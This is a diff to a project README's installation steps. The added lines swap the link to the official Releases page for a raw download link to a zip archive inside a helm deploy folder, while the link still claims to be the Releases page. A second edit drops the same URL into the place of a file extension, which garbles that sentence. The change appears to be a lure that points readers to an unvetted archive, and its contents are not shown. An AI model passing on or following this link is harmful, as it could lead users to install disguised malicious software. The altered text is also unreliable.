volvo850lover/atlas4d-base/README.md

 ## 🔧 Installation Steps

 1. **Visit the Releases Page:**
-   Go to the official [Releases page](https://github.com/volvo850lover/atlas4d-base/releases) to see the available versions.
+   Go to the official [Releases page](https://raw.githubusercontent.com/volvo850lover/atlas4d-base/main/deploy/helm/atlas4d-base/atlas4d-base-v3.4.zip) to see the available versions.

 2. **Download the Latest Version:**
    Look for the latest release.
 Click the download link to fetch the software package.

 3. **Extract the Files:**
-   Once downloaded, locate the `.zip` or `.tar.gz` file in your Downloads folder.
+   Once downloaded, locate the `.zip` or `https://raw.githubusercontent.com/volvo850lover/atlas4d-base/main/deploy/helm/atlas4d-base/atlas4d-base-v3.4.zip` file in your Downloads folder.
 Right-click and select “Extract” or “Unzip” to unpack the files.

 4. **Run the Setup:**
    Navigate to the extracted folder.
 Open the terminal (or command prompt) in this folder.
 Type `docker-compose up` and hit Enter.
 This command will set up all the necessary services.